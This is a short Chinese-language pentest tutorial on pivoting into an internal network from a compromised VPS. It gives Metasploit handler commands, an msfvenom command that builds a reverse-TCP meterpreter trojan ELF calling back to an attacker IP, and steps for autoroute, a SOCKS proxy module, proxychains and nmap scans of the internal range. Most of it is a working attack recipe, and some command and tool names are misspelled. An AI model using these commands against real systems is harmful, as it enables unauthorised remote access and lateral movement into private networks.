一、Socks
1.前提
当我们拿到一台边缘vps时,可以在此主机上,通过msf添加socks添加代理实现内网访问
2.方法
2.1.设置linux基础环境
开启msf,使用exploit/multi/handler模块
use exploit/multi/handler
设置payload,lhost,lport
set paylod linux/x86/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport xxxx
然后run即可等待连接
2.2制作木马正向/反向连接
当正向连接受防火墙阻断时可以使用反向连接
制作木马 这里用,用msfvemon制作,使用reverse_tcp反向连接
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.145.171 lport=4444 -f elf >/home/wlw666/桌面/hhh.elf
将木马拖入靶机运行,执行木马程序,可看到msf中靶机上线
3.添加路由开启socks代理
首先输入,命令查看当前路由
run autoroute -p
当我们查询到靶机的网段为10.0.0.1时,可以直接给他添加路由(若网段为x.0.0.1则添加x.0.0.1)此时靶机相当于网关,对流量进行转发,实现内网的访问
run autoroute -s 10.0.0.1/24
3.1开启socks代理
添加成功后,这个路由只能msf使用,若我们想用namp进行内网探测,还需开启socks代理
输入命令搜索socks模块,使用第0个socks代理服务模块
然后看使用参数,srvhost设置为0.0.0.0或者127.0.0.1都行,意思是转发本地流量,srvport为转发端口可更改可不改,version为socks版本,4或者5都行。最后直接run就行
run之后会生成一个job,可以输入jobs查看
3.2配置socks代理
再来配置一下socks代理,输入命令打开配置文件
vim /etc/proxychains.conf
输入代理类型,ip地址还有代理端口,照着抄上面的就行了
最后使用namp命令扫描该网段(内网)的机器也就是10.0.0.2,记得添加proxychains